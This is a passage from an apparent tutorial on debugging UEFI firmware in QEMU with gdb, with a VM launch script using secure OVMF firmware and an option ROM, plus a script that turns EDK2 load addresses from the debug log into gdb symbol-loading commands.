$ ./start-vm.sh -s -S 


$ gdb 


(gdb) source gdbscript 
(gdb) target remote localhost:1234 


start-vm.sh [15] 


#!/bin/bash
set -Eeuxo pipefail

LOG="debug.log"
MACHINE_NAME="disk"
QEMU_IMG="${MACHINE_NAME}.img"
SSH_PORT="5555"
OVMF_CODE_SECURE="ovmf/OVMF_CODE_SECURE.fd"
OVMF_VARS_ORIG="/usr/share/OVMF/OVMF_VARS_4M.ms.fd"
OVMF_VARS_SECURE="ovmf/OVMF_VARS_4M_SECURE.ms.fd"

if [ ! -e "${QEMU_IMG}" ]; then
    qemu-img create -f qcow2 "${QEMU_IMG}" 8G
fi

# Create the writable variable store from the pristine copy on first run
if [ ! -e "${OVMF_VARS_SECURE}" ]; then
    cp "${OVMF_VARS_ORIG}" "${OVMF_VARS_SECURE}"
fi

qemu-system-x86_64 \
    -enable-kvm \
    -cpu host -smp cores=4,threads=1 -m 2048 \
    -object rng-random,filename=/dev/urandom,id=rng0 \
    -device virtio-rng-pci,rng=rng0 \
    -net nic,model=virtio -net user,hostfwd=tcp::${SSH_PORT}-:22 \
    -name "${MACHINE_NAME}" \
    -drive file="${QEMU_IMG}",format=qcow2 \
    -vga virtio \
    -machine q35,smm=on \
    -global driver=cfi.pflash01,property=secure,value=on \
    -drive format=raw,file=fat:rw:fs1 \
    -drive if=pflash,format=raw,unit=0,file="${OVMF_CODE_SECURE}",readonly=on \
    -drive if=pflash,format=raw,unit=1,file="${OVMF_VARS_SECURE}" \
    -debugcon file:"${LOG}" -global isa-debugcon.iobase=0x402 \
    -global ICH9-LPC.disable_s3=1 \
    -serial file:com1.log \
    -device e1000e,romfile=chainloader.efirom \
    "$@"


gen_symbol_offsets.sh, adapted from [5] 


#!/bin/bash

LOG="../debug.log"
PEINFO="peinfo/peinfo"

cat ${LOG} | grep Loading | grep -i efi | while read LINE; do
    BASE="`echo ${LINE} | cut -d " " -f4`"
    NAME="`echo ${LINE} | cut -d " " -f6 | tr -d "[:cntrl:]"`"
    EFIFILE="`find <path to edk2>/Build/MdeModule/DEBUG_GCC5/X64 -name ${NAME} \
        -maxdepth 1 -type f`"
    if [ -z "$EFIFILE" ]
    then
        # no matching .efi in the build directory: nothing to emit
        :
    else
        ADDR="`${PEINFO} ${EFIFILE} \
            | grep -A 5 text | grep VirtualAddress | cut -d " " -f2`"
        TEXT="`python -c "print (hex(${BASE} + ${ADDR}))"`"
        SYMS="`echo ${NAME} | sed -e "s/\.efi/\.debug/g"`"
        SYMFILE="`find <path to edk2>/Build/MdeModule/DEBUG_GCC5/X64 -name ${SYMS} \
            -maxdepth 1 -type f`"
        echo "add-symbol-file ${SYMFILE} ${TEXT}"
    fi
done